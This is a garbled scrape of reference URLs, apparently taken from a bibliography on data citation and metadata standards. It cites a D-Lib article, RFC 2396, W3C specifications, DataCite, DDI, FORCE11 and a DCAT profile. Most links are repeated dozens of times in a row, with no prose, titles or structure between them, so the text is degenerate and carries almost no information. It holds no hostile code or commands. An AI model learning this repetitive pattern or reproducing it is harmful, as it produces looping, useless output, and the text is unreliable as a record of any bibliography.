http://www.dlib.org/dlib/march07/altman/03altman.html http://www.dlib.org/dlib/march07/altman/03altman.html http://www.dlib.org/dlib/march07/altman/03altman.html http://www.dlib.org/dlib/march07/altman/03altman.html http://www.dlib.org/dlib/march07/altman/03altman.html http://www.dlib.org/dlib/march07/altman/03altman.html http://www.dlib.org/dlib/march07/altman/03altman.html http://www.dlib.org/dlib/march07/altman/03altman.html http://www.dlib.org/dlib/march07/altman/03altman.html http://www.dlib.org/dlib/march07/altman/03altman.html http://www.dlib.org/dlib/march07/altman/03altman.html http://www.dlib.org/dlib/march07/altman/03altman.html http://www.dlib.org/dlib/march07/altman/03altman.html http://www.dlib.org/dlib/march07/altman/03altman.html http://www.dlib.org/dlib/march07/altman/03altman.html http://www.dlib.org/dlib/march07/altman/03altman.html http://www.dlib.org/dlib/march07/altman/03altman.html http://www.dlib.org/dlib/march07/altman/03altman.html http://www.dlib.org/dlib/march07/altman/03altman.html http://www.dlib.org/dlib/march07/altman/03altman.html http://www.dlib.org/dlib/march07/altman/03altman.html http://www.dlib.org/dlib/march07/altman/03altman.html http://www.dlib.org/dlib/march07/altman/03altman.html http://www.dlib.org/dlib/march07/altman/03altman.html http://www.dlib.org/dlib/march07/altman/03altman.html http://www.dlib.org/dlib/march07/altman/03altman.html http://www.dlib.org/dlib/march07/altman/03altman.html http://www.dlib.org/dlib/march07/altman/03altman.html http://www.dlib.org/dlib/march07/altman/03altman.html http://www.dlib.org/dlib/march07/altman/03altman.html http://www.dlib.org/dlib/march07/altman/03altman.html http://www.dlib.org/dlib/march07/altman/03altman.html http://www.dlib.org/dlib/march07/altman/03altman.html http://www.dlib.org/dlib/march07/altman/03altman.html http://www.dlib.org/dlib/march07/altman/03altman.html http://www.dlib.org/dlib/march07/altman/03altman.html http://www.dlib.org/dlib/march07/altman/03altman.html http://www.dlib.org/dlib/march07/altman/03altman.html http://www.dcc.ac.uk/resources/how-guides http://www.dcc.ac.uk/resources/how-guides http://www.dcc.ac.uk/resources/how-guides http://www.dcc.ac.uk/resources/how-guides http://www.dcc.ac.uk/resources/how-guides http://www.dcc.ac.uk/resources/how-guides http://www.dcc.ac.uk/resources/how-guides http://www.dcc.ac.uk/resources/how-guides http://www.dcc.ac.uk/resources/how-guides http://www.dcc.ac.uk/resources/how-guides http://www.dcc.ac.uk/resources/how-guides http://www.dcc.ac.uk/resources/how-guides http://www.dcc.ac.uk/resources/how-guides http://www.dcc.ac.uk/resources/how-guides http://www.dcc.ac.uk/resources/how-guides http://www.dcc.ac.uk/resources/how-guides http://www.dcc.ac.uk/resources/how-guides http://www.dcc.ac.uk/resources/how-guides http://www.dcc.ac.uk/resources/how-guides http://www.dcc.ac.uk/resources/how-guides http://www.dcc.ac.uk/resources/how-guides http://www.dcc.ac.uk/resources/how-guides http://www.dcc.ac.uk/resources/how-guides http://www.dcc.ac.uk/resources/how-guides http://www.dcc.ac.uk/resources/how-guides http://www.dcc.ac.uk/resources/how-guides http://www.dcc.ac.uk/resources/how-guides http://www.dcc.ac.uk/resources/how-guides http://www.dcc.ac.uk/resources/how-guides http://www.dcc.ac.uk/resources/how-guides http://www.dcc.ac.uk/resources/how-guides http://www.dcc.ac.uk/resources/how-guides http://www.dcc.ac.uk/resources/how-guides http://www.dcc.ac.uk/resources/how-guides http://www.dcc.ac.uk/resources/how-guides http://www.dcc.ac.uk/resources/how-guides http://www.dcc.ac.uk/resources/how-guides http://www.dcc.ac.uk/resources/how-guides http://www.dcc.ac.uk/resources/how-guides http://www.dcc.ac.uk/resources/how-guides http://www.dcc.ac.uk/resources/how-guides http://dx.doi.org/10.1038/483531a https://www.ietf.org/rfc/rfc2396.txt https://www.ietf.org/rfc/rfc2396.txt https://www.ietf.org/rfc/rfc2396.txt https://www.ietf.org/rfc/rfc2396.txt https://www.ietf.org/rfc/rfc2396.txt https://www.ietf.org/rfc/rfc2396.txt https://www.ietf.org/rfc/rfc2396.txt https://www.ietf.org/rfc/rfc2396.txt https://www.ietf.org/rfc/rfc2396.txt https://www.ietf.org/rfc/rfc2396.txt https://www.ietf.org/rfc/rfc2396.txt https://www.ietf.org/rfc/rfc2396.txt https://www.ietf.org/rfc/rfc2396.txt https://www.ietf.org/rfc/rfc2396.txt https://www.ietf.org/rfc/rfc2396.txt https://www.ietf.org/rfc/rfc2396.txt https://www.ietf.org/rfc/rfc2396.txt https://www.ietf.org/rfc/rfc2396.txt https://www.ietf.org/rfc/rfc2396.txt https://www.ietf.org/rfc/rfc2396.txt https://www.ietf.org/rfc/rfc2396.txt https://www.ietf.org/rfc/rfc2396.txt https://www.ietf.org/rfc/rfc2396.txt https://www.ietf.org/rfc/rfc2396.txt https://www.ietf.org/rfc/rfc2396.txt https://www.ietf.org/rfc/rfc2396.txt https://www.ietf.org/rfc/rfc2396.txt https://www.ietf.org/rfc/rfc2396.txt https://www.ietf.org/rfc/rfc2396.txt https://www.ietf.org/rfc/rfc2396.txt https://www.ietf.org/rfc/rfc2396.txt https://www.ietf.org/rfc/rfc2396.txt https://www.ietf.org/rfc/rfc2396.txt https://www.ietf.org/rfc/rfc2396.txt https://www.ietf.org/rfc/rfc2396.txt https://www.ietf.org/rfc/rfc2396.txt http://www.w3.org/TR/ws-arch/ http://www.w3.org/TR/ws-arch/ http://www.w3.org/TR/ws-arch/ http://www.w3.org/TR/ws-arch/ http://www.w3.org/TR/ws-arch/ http://www.w3.org/TR/ws-arch/ http://www.w3.org/TR/ws-arch/ http://www.w3.org/TR/ws-arch/ http://www.w3.org/TR/ws-arch/ http://www.w3.org/TR/ws-arch/ http://www.w3.org/TR/ws-arch/ http://www.w3.org/TR/ws-arch/ http://www.w3.org/TR/ws-arch/ http://www.w3.org/TR/ws-arch/ http://www.w3.org/TR/ws-arch/ http://www.w3.org/TR/ws-arch/ http://www.w3.org/TR/ws-arch/ http://www.w3.org/TR/ws-arch/ http://www.w3.org/TR/ws-arch/ http://www.w3.org/TR/ws-arch/ http://www.w3.org/TR/ws-arch/ http://www.w3.org/TR/ws-arch/ http://www.w3.org/TR/ws-arch/ http://www.w3.org/TR/ws-arch/ http://www.w3.org/TR/ws-arch/ http://www.w3.org/TR/ws-arch/ http://www.w3.org/TR/ws-arch/ http://www.w3.org/TR/ws-arch/ http://www.w3.org/TR/ws-arch/ http://www.w3.org/TR/REC-xml/ http://www.w3.org/TR/REC-xml/ http://www.w3.org/TR/REC-xml/ http://www.w3.org/TR/REC-xml/ http://www.w3.org/TR/REC-xml/ http://www.w3.org/TR/REC-xml/ http://www.w3.org/TR/REC-xml/ http://www.w3.org/TR/REC-xml/ http://www.w3.org/TR/REC-xml/ http://www.w3.org/TR/REC-xml/ http://www.w3.org/TR/REC-xml/ http://www.w3.org/TR/REC-xml/ http://www.w3.org/TR/REC-xml/ http://www.w3.org/TR/REC-xml/ http://www.w3.org/TR/REC-xml/ http://www.w3.org/TR/REC-xml/ http://www.w3.org/TR/REC-xml/ http://www.w3.org/TR/REC-xml/ http://www.w3.org/TR/REC-xml/ http://www.w3.org/TR/REC-xml/ http://www.w3.org/TR/REC-xml/ http://www.w3.org/TR/REC-xml/ http://www.w3.org/TR/REC-xml/ http://www.w3.org/TR/REC-xml/ http://www.w3.org/TR/REC-xml/ http://www.w3.org/TR/REC-xml/ http://www.w3.org/TR/REC-xml/ http://www.w3.org/TR/REC-xml/ http://www.w3.org/TR/REC-xml/ http://www.fdsn.org/wgIII/V1.0-21Jul2014-DOIFDSN.pdf http://www.fdsn.org/wgIII/V1.0-21Jul2014-DOIFDSN.pdf http://www.fdsn.org/wgIII/V1.0-21Jul2014-DOIFDSN.pdf http://www.fdsn.org/wgIII/V1.0-21Jul2014-DOIFDSN.pdf http://www.fdsn.org/wgIII/V1.0-21Jul2014-DOIFDSN.pdf http://www.fdsn.org/wgIII/V1.0-21Jul2014-DOIFDSN.pdf http://www.fdsn.org/wgIII/V1.0-21Jul2014-DOIFDSN.pdf http://www.fdsn.org/wgIII/V1.0-21Jul2014-DOIFDSN.pdf http://www.fdsn.org/wgIII/V1.0-21Jul2014-DOIFDSN.pdf http://www.fdsn.org/wgIII/V1.0-21Jul2014-DOIFDSN.pdf http://www.fdsn.org/wgIII/V1.0-21Jul2014-DOIFDSN.pdf http://www.fdsn.org/wgIII/V1.0-21Jul2014-DOIFDSN.pdf http://www.fdsn.org/wgIII/V1.0-21Jul2014-DOIFDSN.pdf http://www.fdsn.org/wgIII/V1.0-21Jul2014-DOIFDSN.pdf http://www.fdsn.org/wgIII/V1.0-21Jul2014-DOIFDSN.pdf http://www.fdsn.org/wgIII/V1.0-21Jul2014-DOIFDSN.pdf http://www.fdsn.org/wgIII/V1.0-21Jul2014-DOIFDSN.pdf http://www.fdsn.org/wgIII/V1.0-21Jul2014-DOIFDSN.pdf http://www.fdsn.org/wgIII/V1.0-21Jul2014-DOIFDSN.pdf http://www.fdsn.org/wgIII/V1.0-21Jul2014-DOIFDSN.pdf http://www.fdsn.org/wgIII/V1.0-21Jul2014-DOIFDSN.pdf http://www.fdsn.org/wgIII/V1.0-21Jul2014-DOIFDSN.pdf http://www.fdsn.org/wgIII/V1.0-21Jul2014-DOIFDSN.pdf http://www.fdsn.org/wgIII/V1.0-21Jul2014-DOIFDSN.pdf http://www.fdsn.org/wgIII/V1.0-21Jul2014-DOIFDSN.pdf http://www.fdsn.org/wgIII/V1.0-21Jul2014-DOIFDSN.pdf http://www.fdsn.org/wgIII/V1.0-21Jul2014-DOIFDSN.pdf http://www.fdsn.org/wgIII/V1.0-21Jul2014-DOIFDSN.pdf http://www.fdsn.org/wgIII/V1.0-21Jul2014-DOIFDSN.pdf http://www.fdsn.org/wgIII/V1.0-21Jul2014-DOIFDSN.pdf http://www.fdsn.org/wgIII/V1.0-21Jul2014-DOIFDSN.pdf http://www.fdsn.org/wgIII/V1.0-21Jul2014-DOIFDSN.pdf http://www.fdsn.org/wgIII/V1.0-21Jul2014-DOIFDSN.pdf http://www.fdsn.org/wgIII/V1.0-21Jul2014-DOIFDSN.pdf http://www.fdsn.org/wgIII/V1.0-21Jul2014-DOIFDSN.pdf http://www.fdsn.org/wgIII/V1.0-21Jul2014-DOIFDSN.pdf http://www.fdsn.org/wgIII/V1.0-21Jul2014-DOIFDSN.pdf http://www.fdsn.org/wgIII/V1.0-21Jul2014-DOIFDSN.pdf http://www.fdsn.org/wgIII/V1.0-21Jul2014-DOIFDSN.pdf http://www.fdsn.org/wgIII/V1.0-21Jul2014-DOIFDSN.pdf http://www.fdsn.org/wgIII/V1.0-21Jul2014-DOIFDSN.pdf http://www.fdsn.org/wgIII/V1.0-21Jul2014-DOIFDSN.pdf http://www.fdsn.org/wgIII/V1.0-21Jul2014-DOIFDSN.pdf http://www.fdsn.org/wgIII/V1.0-21Jul2014-DOIFDSN.pdf http://www.fdsn.org/wgIII/V1.0-21Jul2014-DOIFDSN.pdf http://www.fdsn.org/wgIII/V1.0-21Jul2014-DOIFDSN.pdf http://www.fdsn.org/wgIII/V1.0-21Jul2014-DOIFDSN.pdf http://www.fdsn.org/wgIII/V1.0-21Jul2014-DOIFDSN.pdf http://www.fdsn.org/wgIII/V1.0-21Jul2014-DOIFDSN.pdf http://www.fdsn.org/wgIII/V1.0-21Jul2014-DOIFDSN.pdf http://www.fdsn.org/wgIII/V1.0-21Jul2014-DOIFDSN.pdf http://www.fdsn.org/wgIII/V1.0-21Jul2014-DOIFDSN.pdf http://www.w3.org/TR/webarch/#identification http://www.w3.org/TR/webarch/#identification http://www.w3.org/TR/webarch/#identification http://www.w3.org/TR/webarch/#identification http://www.w3.org/TR/webarch/#identification http://www.w3.org/TR/webarch/#identification http://www.w3.org/TR/webarch/#identification http://www.w3.org/TR/webarch/#identification http://www.w3.org/TR/webarch/#identification http://www.w3.org/TR/webarch/#identification http://www.w3.org/TR/webarch/#identification http://www.w3.org/TR/webarch/#identification http://www.w3.org/TR/webarch/#identification http://www.w3.org/TR/webarch/#identification http://www.w3.org/TR/webarch/#identification http://www.w3.org/TR/webarch/#identification http://www.w3.org/TR/webarch/#identification http://www.w3.org/TR/webarch/#identification http://www.w3.org/TR/webarch/#identification http://www.w3.org/TR/webarch/#identification http://www.w3.org/TR/webarch/#identification http://www.w3.org/TR/webarch/#identification http://www.w3.org/TR/webarch/#identification http://www.w3.org/TR/webarch/#identification http://www.w3.org/TR/webarch/#identification http://www.w3.org/TR/webarch/#identification http://www.w3.org/TR/webarch/#identification http://www.w3.org/TR/webarch/#identification http://www.w3.org/TR/webarch/#identification http://www.w3.org/TR/webarch/#identification http://www.w3.org/TR/webarch/#identification http://www.w3.org/TR/webarch/#identification http://www.w3.org/TR/webarch/#identification http://www.w3.org/TR/webarch/#identification http://www.w3.org/TR/webarch/#identification http://www.w3.org/TR/webarch/#identification http://www.w3.org/TR/webarch/#identification http://www.w3.org/TR/webarch/#identification http://www.w3.org/TR/webarch/#identification http://www.w3.org/TR/webarch/#identification http://www.w3.org/TR/webarch/#identification http://www.w3.org/TR/webarch/#identification http://www.w3.org/TR/webarch/#identification http://www.w3.org/TR/webarch/#identification http://dx.doi.org/10.2481/dsj.OSOM13-043 http://dx.doi.org/10.1098/rsos.140216 http://force11.org/datacitation http://force11.org/datacitation http://force11.org/datacitation http://force11.org/datacitation http://force11.org/datacitation http://force11.org/datacitation http://force11.org/datacitation http://force11.org/datacitation http://force11.org/datacitation http://force11.org/datacitation http://force11.org/datacitation http://force11.org/datacitation http://force11.org/datacitation http://force11.org/datacitation http://force11.org/datacitation http://force11.org/datacitation http://force11.org/datacitation http://force11.org/datacitation http://force11.org/datacitation http://force11.org/datacitation http://force11.org/datacitation http://force11.org/datacitation http://force11.org/datacitation http://force11.org/datacitation http://force11.org/datacitation http://force11.org/datacitation http://force11.org/datacitation http://force11.org/datacitation http://force11.org/datacitation http://force11.org/datacitation http://force11.org/datacitation http://www.ddialliance.org/Specification/ http://www.ddialliance.org/Specification/ http://www.ddialliance.org/Specification/ http://www.ddialliance.org/Specification/ http://www.ddialliance.org/Specification/ http://www.ddialliance.org/Specification/ http://www.ddialliance.org/Specification/ http://www.ddialliance.org/Specification/ http://www.ddialliance.org/Specification/ http://www.ddialliance.org/Specification/ http://www.ddialliance.org/Specification/ http://www.ddialliance.org/Specification/ http://www.ddialliance.org/Specification/ http://www.ddialliance.org/Specification/ http://www.ddialliance.org/Specification/ http://www.ddialliance.org/Specification/ http://www.ddialliance.org/Specification/ http://www.ddialliance.org/Specification/ http://www.ddialliance.org/Specification/ http://www.ddialliance.org/Specification/ http://www.ddialliance.org/Specification/ http://www.ddialliance.org/Specification/ http://www.ddialliance.org/Specification/ http://www.ddialliance.org/Specification/ http://www.ddialliance.org/Specification/ http://www.ddialliance.org/Specification/ http://www.ddialliance.org/Specification/ http://www.ddialliance.org/Specification/ http://www.ddialliance.org/Specification/ http://www.ddialliance.org/Specification/ http://www.ddialliance.org/Specification/ http://www.ddialliance.org/Specification/ http://www.ddialliance.org/Specification/ http://www.ddialliance.org/Specification/ http://www.ddialliance.org/Specification/ http://www.ddialliance.org/Specification/ http://www.ddialliance.org/Specification/ http://www.ddialliance.org/Specification/ http://www.ddialliance.org/Specification/ http://www.ddialliance.org/Specification/ http://www.ddialliance.org/Specification/ http://schema.datacite.org/meta/kernel-3.1/doc/DataCite-MetadataKernel_v3.1.pdf http://schema.datacite.org/meta/kernel-3.1/doc/DataCite-MetadataKernel_v3.1.pdf http://schema.datacite.org/meta/kernel-3.1/doc/DataCite-MetadataKernel_v3.1.pdf http://schema.datacite.org/meta/kernel-3.1/doc/DataCite-MetadataKernel_v3.1.pdf http://schema.datacite.org/meta/kernel-3.1/doc/DataCite-MetadataKernel_v3.1.pdf http://schema.datacite.org/meta/kernel-3.1/doc/DataCite-MetadataKernel_v3.1.pdf http://schema.datacite.org/meta/kernel-3.1/doc/DataCite-MetadataKernel_v3.1.pdf http://schema.datacite.org/meta/kernel-3.1/doc/DataCite-MetadataKernel_v3.1.pdf http://schema.datacite.org/meta/kernel-3.1/doc/DataCite-MetadataKernel_v3.1.pdf http://schema.datacite.org/meta/kernel-3.1/doc/DataCite-MetadataKernel_v3.1.pdf http://schema.datacite.org/meta/kernel-3.1/doc/DataCite-MetadataKernel_v3.1.pdf http://schema.datacite.org/meta/kernel-3.1/doc/DataCite-MetadataKernel_v3.1.pdf http://schema.datacite.org/meta/kernel-3.1/doc/DataCite-MetadataKernel_v3.1.pdf http://schema.datacite.org/meta/kernel-3.1/doc/DataCite-MetadataKernel_v3.1.pdf http://schema.datacite.org/meta/kernel-3.1/doc/DataCite-MetadataKernel_v3.1.pdf http://schema.datacite.org/meta/kernel-3.1/doc/DataCite-MetadataKernel_v3.1.pdf http://schema.datacite.org/meta/kernel-3.1/doc/DataCite-MetadataKernel_v3.1.pdf http://schema.datacite.org/meta/kernel-3.1/doc/DataCite-MetadataKernel_v3.1.pdf http://schema.datacite.org/meta/kernel-3.1/doc/DataCite-MetadataKernel_v3.1.pdf http://schema.datacite.org/meta/kernel-3.1/doc/DataCite-MetadataKernel_v3.1.pdf http://schema.datacite.org/meta/kernel-3.1/doc/DataCite-MetadataKernel_v3.1.pdf http://schema.datacite.org/meta/kernel-3.1/doc/DataCite-MetadataKernel_v3.1.pdf http://schema.datacite.org/meta/kernel-3.1/doc/DataCite-MetadataKernel_v3.1.pdf http://schema.datacite.org/meta/kernel-3.1/doc/DataCite-MetadataKernel_v3.1.pdf http://schema.datacite.org/meta/kernel-3.1/doc/DataCite-MetadataKernel_v3.1.pdf http://schema.datacite.org/meta/kernel-3.1/doc/DataCite-MetadataKernel_v3.1.pdf http://schema.datacite.org/meta/kernel-3.1/doc/DataCite-MetadataKernel_v3.1.pdf http://schema.datacite.org/meta/kernel-3.1/doc/DataCite-MetadataKernel_v3.1.pdf http://schema.datacite.org/meta/kernel-3.1/doc/DataCite-MetadataKernel_v3.1.pdf http://schema.datacite.org/meta/kernel-3.1/doc/DataCite-MetadataKernel_v3.1.pdf http://schema.datacite.org/meta/kernel-3.1/doc/DataCite-MetadataKernel_v3.1.pdf http://schema.datacite.org/meta/kernel-3.1/doc/DataCite-MetadataKernel_v3.1.pdf http://schema.datacite.org/meta/kernel-3.1/doc/DataCite-MetadataKernel_v3.1.pdf http://schema.datacite.org/meta/kernel-3.1/doc/DataCite-MetadataKernel_v3.1.pdf http://schema.datacite.org/meta/kernel-3.1/doc/DataCite-MetadataKernel_v3.1.pdf http://schema.datacite.org/meta/kernel-3.1/doc/DataCite-MetadataKernel_v3.1.pdf http://schema.datacite.org/meta/kernel-3.1/doc/DataCite-MetadataKernel_v3.1.pdf http://schema.datacite.org/meta/kernel-3.1/doc/DataCite-MetadataKernel_v3.1.pdf http://schema.datacite.org/meta/kernel-3.1/doc/DataCite-MetadataKernel_v3.1.pdf http://schema.datacite.org/meta/kernel-3.1/doc/DataCite-MetadataKernel_v3.1.pdf http://schema.datacite.org/meta/kernel-3.1/doc/DataCite-MetadataKernel_v3.1.pdf http://schema.datacite.org/meta/kernel-3.1/doc/DataCite-MetadataKernel_v3.1.pdf http://schema.datacite.org/meta/kernel-3.1/doc/DataCite-MetadataKernel_v3.1.pdf http://schema.datacite.org/meta/kernel-3.1/doc/DataCite-MetadataKernel_v3.1.pdf http://schema.datacite.org/meta/kernel-3.1/doc/DataCite-MetadataKernel_v3.1.pdf http://schema.datacite.org/meta/kernel-3.1/doc/DataCite-MetadataKernel_v3.1.pdf http://schema.datacite.org/meta/kernel-3.1/doc/DataCite-MetadataKernel_v3.1.pdf http://schema.datacite.org/meta/kernel-3.1/doc/DataCite-MetadataKernel_v3.1.pdf http://schema.datacite.org/meta/kernel-3.1/doc/DataCite-MetadataKernel_v3.1.pdf http://schema.datacite.org/meta/kernel-3.1/doc/DataCite-MetadataKernel_v3.1.pdf http://schema.datacite.org/meta/kernel-3.1/doc/DataCite-MetadataKernel_v3.1.pdf http://schema.datacite.org/meta/kernel-3.1/doc/DataCite-MetadataKernel_v3.1.pdf http://schema.datacite.org/meta/kernel-3.1/doc/DataCite-MetadataKernel_v3.1.pdf http://schema.datacite.org/meta/kernel-3.1/doc/DataCite-MetadataKernel_v3.1.pdf http://schema.datacite.org/meta/kernel-3.1/doc/DataCite-MetadataKernel_v3.1.pdf http://schema.datacite.org/meta/kernel-3.1/doc/DataCite-MetadataKernel_v3.1.pdf http://schema.datacite.org/meta/kernel-3.1/doc/DataCite-MetadataKernel_v3.1.pdf http://schema.datacite.org/meta/kernel-3.1/doc/DataCite-MetadataKernel_v3.1.pdf http://schema.datacite.org/meta/kernel-3.1/doc/DataCite-MetadataKernel_v3.1.pdf http://schema.datacite.org/meta/kernel-3.1/doc/DataCite-MetadataKernel_v3.1.pdf http://schema.datacite.org/meta/kernel-3.1/doc/DataCite-MetadataKernel_v3.1.pdf http://schema.datacite.org/meta/kernel-3.1/doc/DataCite-MetadataKernel_v3.1.pdf http://schema.datacite.org/meta/kernel-3.1/doc/DataCite-MetadataKernel_v3.1.pdf http://schema.datacite.org/meta/kernel-3.1/doc/DataCite-MetadataKernel_v3.1.pdf http://schema.datacite.org/meta/kernel-3.1/doc/DataCite-MetadataKernel_v3.1.pdf http://schema.datacite.org/meta/kernel-3.1/doc/DataCite-MetadataKernel_v3.1.pdf http://schema.datacite.org/meta/kernel-3.1/doc/DataCite-MetadataKernel_v3.1.pdf http://schema.datacite.org/meta/kernel-3.1/doc/DataCite-MetadataKernel_v3.1.pdf http://schema.datacite.org/meta/kernel-3.1/doc/DataCite-MetadataKernel_v3.1.pdf http://schema.datacite.org/meta/kernel-3.1/doc/DataCite-MetadataKernel_v3.1.pdf http://schema.datacite.org/meta/kernel-3.1/doc/DataCite-MetadataKernel_v3.1.pdf http://schema.datacite.org/meta/kernel-3.1/doc/DataCite-MetadataKernel_v3.1.pdf http://schema.datacite.org/meta/kernel-3.1/doc/DataCite-MetadataKernel_v3.1.pdf http://schema.datacite.org/meta/kernel-3.1/doc/DataCite-MetadataKernel_v3.1.pdf http://schema.datacite.org/meta/kernel-3.1/doc/DataCite-MetadataKernel_v3.1.pdf http://schema.datacite.org/meta/kernel-3.1/doc/DataCite-MetadataKernel_v3.1.pdf http://schema.datacite.org/meta/kernel-3.1/doc/DataCite-MetadataKernel_v3.1.pdf http://schema.datacite.org/meta/kernel-3.1/doc/DataCite-MetadataKernel_v3.1.pdf http://schema.datacite.org/meta/kernel-3.1/doc/DataCite-MetadataKernel_v3.1.pdf https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final https://joinup.ec.europa.eu/asset/dcat_application_profile/asset_release/dcat-application-profile-data-portals-europe-final 